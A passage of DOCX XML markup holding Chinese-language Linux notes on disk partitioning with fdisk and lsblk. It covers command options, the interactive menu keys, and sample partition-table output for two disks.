    <w:p w14:paraId="5A2257B7" w14:textId="77777777" w:rsidR="008D3EF8" w:rsidRDefault="008D3EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B872EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="_Toc159779713"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>磁盘分区管理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="1A1DC996" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CB5105" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fdisk -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EFD1E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705487BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图，磁盘的话，可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后分区成啥，就是那个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E89BC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更直观一些的话，可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsblk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看块设备信息，块设备一般指分区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AC0E35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA9F207" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对磁盘进行分区的话，参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/wonain/article/details/104337381</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6CA3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="50F25FDA" wp14:editId="7D5421CE">
            <wp:extent cx="4059555" cy="3022600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1016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78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4059555" cy="3022600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17795BE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="_Toc159779714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘与磁盘分区、分区表、文件系统的关系</w:t>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
    </w:p>
    <w:p w14:paraId="25C698C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1FA1E675" wp14:editId="2112CB7B">
            <wp:extent cx="2802255" cy="2372360"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="4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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2802255" cy="2372360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE02CE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A565520" w14:textId="1A42C856" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="_Toc159779715"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidR="00D1334C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：编辑分区</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="0219D13B" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526B63D8" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必要参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE237C5" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D828CC3" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00FF19C2" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF19C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-l </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF19C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列出素所有分区表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645EC29F" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF19C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF19C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF19C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF19C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>搭配使用，显示分区数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D26EE" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB31C7" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A19DC6" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-s&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分区编号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定分区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E7FC9" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE9071B" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>菜单操作说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC25C6C" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6044E5" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：显示菜单和帮助信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FDEBB" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：活动分区标记</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引导分区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33508819" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：删除分区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381EA98" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：显示分区类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1195F3" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：新建分区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB23EC1" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：显示分区信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E43C9" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">q </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：退出不保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B4F68" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：设置分区号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC23D5F" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：进行分区检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B93144" w14:textId="77777777" w:rsidR="00734456" w:rsidRPr="00D6090A" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">w </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：保存修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A3C9AF" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6090A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：扩展应用，高级功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CF919" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6CE23E" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示当前分区情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023013CF" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097490EB" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># fdisk -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E83AFF" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032C3F3E" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Disk /dev/sda: 10.7 GB, 10737418240 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382E651" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>255 heads, 63 sectors/track, 1305 cylinders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAA57E" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Units = cylinders of 16065 * 512 = 8225280 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3BAB1C" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1820574C" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Device Boot   Start     End   Blocks  Id System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC1B77B" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/dev/sda1  *      1     13   104391  83 Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A8BE5A" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/dev/sda2       14    1305  10377990  8e Linux LVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B6647" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AF74A1" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Disk /dev/sdb: 5368 MB, 5368709120 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A1F3B" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>255 heads, 63 sectors/track, 652 cylinders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2CD81A" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Units = cylinders of 16065 * 512 = 8225280 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B23BA" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4695F3" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Disk /dev/sdb doesn't contain a valid partition table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF35D06" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SCSI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬盘的每个分区情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75448F89" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62436B3C" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># fdisk -lu  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75CF5D" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A0F235" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Disk /dev/sda: 10.7 GB, 10737418240 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78C9C6" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>255 heads, 63 sectors/track, 1305 cylinders, total 20971520 sectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E187C5" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Units = sectors of 1 * 512 = 512 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55227E69" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275866ED" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
